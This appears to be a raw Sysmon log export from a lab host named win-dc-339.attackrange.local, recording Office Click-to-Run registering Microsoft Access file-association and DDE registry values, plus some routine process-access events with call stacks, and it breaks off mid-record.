13241300x800000000000000075361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.View.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.View.1\shell\design\ddeexec\(Default)[SetForeground][OpenView "%%1", 1] 13241300x800000000000000075359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.170{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.View.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenView "%%1", 1] 13241300x800000000000000075358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.155{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\printto\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\printto\ddeexec\ifexec\(Default)[] 13241300x800000000000000075356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\printto\ddeexec\(Default)[PrintTo "%%1","%%2","%%3","%%4"] 13241300x800000000000000075355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\printto\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [PrintTo "%%1","%%2","%%3","%%4"][ShellQuit] 13241300x800000000000000075354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\print\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\print\ddeexec\ifexec\(Default)[] 13241300x800000000000000075352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\print\ddeexec\(Default)[PrintTo "%%1"] 13241300x800000000000000075351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\print\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [PrintTo "%%1"][ShellQuit] 13241300x800000000000000075350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\preview\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\preview\ddeexec\ifexec\(Default)[] 13241300x800000000000000075348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\preview\ddeexec\(Default)[SetForeground][OpenForm "%%1", 2] 13241300x800000000000000075347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\preview\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenForm "%%1", 2] 13241300x800000000000000075346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\open\ddeexec\(Default)[SetForeground][OpenForm "%%1"] 13241300x800000000000000075343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenForm "%%1"] 13241300x800000000000000075342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\design\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\design\ddeexec\(Default)[SetForeground][OpenForm "%%1", 1] 13241300x800000000000000075339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenForm "%%1", 1] 13241300x800000000000000075338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\datasheet\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\datasheet\ddeexec\ifexec\(Default)[] 13241300x800000000000000075336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\datasheet\ddeexec\(Default)[SetForeground][OpenForm "%%1", 3] 13241300x800000000000000075335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.108{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Form.1\shell\datasheet\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /SHELLSYSTEM [OpenForm "%%1", 3] 10341000x800000000000000075334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.092{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.092{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.092{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075331Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.092{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075330Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.092{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075329Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\printto\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075328Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\printto\ddeexec\ifexec\(Default)[] 13241300x800000000000000075327Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\printto\ddeexec\(Default)[PrintTo "%%1","%%2","%%3","%%4"] 13241300x800000000000000075326Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\printto\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [PrintTo "%%1","%%2","%%3","%%4"][ShellQuit] 13241300x800000000000000075325Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.077{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\print\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075324Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\print\ddeexec\ifexec\(Default)[] 13241300x800000000000000075323Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\print\ddeexec\(Default)[PrintTo "%%1"] 10341000x800000000000000075322Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.061{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE5-607E-1C0D-00000000BB01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000075321Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\print\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [PrintTo "%%1"][ShellQuit] 13241300x800000000000000075320Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\preview\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075319Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\preview\ddeexec\ifexec\(Default)[] 13241300x800000000000000075318Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\preview\ddeexec\(Default)[SetForeground][OpenQuery "%%1", 2] 13241300x800000000000000075317Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.061{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\preview\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenQuery "%%1", 2] 13241300x800000000000000075316Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\open\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075315Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\open\ddeexec\ifexec\(Default)[] 13241300x800000000000000075314Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\open\ddeexec\(Default)[SetForeground][OpenQuery "%%1"] 13241300x800000000000000075313Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE /NOSTARTUP /SHELLSYSTEM [OpenQuery "%%1"] 10341000x800000000000000075312Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.045{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE5-607E-1C0D-00000000BB01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075311Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:41.045{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE5-607E-1C0D-00000000BB01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000075310Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\design\ddeexec\topic\(Default)ShellSystem 13241300x800000000000000075309Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\design\ddeexec\ifexec\(Default)[] 13241300x800000000000000075308Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:41.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\design\ddeexec\(Default)[SetForeground][OpenQuery "%%1", 1] 13241300x800000000000000075307Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.ShortCut.Query.1\shell\design\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP /SHELLSYSTEM [OpenQuery "%%1", 1] 13241300x800000000000000075306Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.030{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\accessthmltemplate\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" 13241300x800000000000000075305Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:41.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.Workgroup.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\MSACCESS.EXE" /NOSTARTUP "%%1" 13241300x800000000000000075304Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:40.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Access.WizardDataFile.16\shell\Open\command\(Default)"C:\Program Files\Microsoft 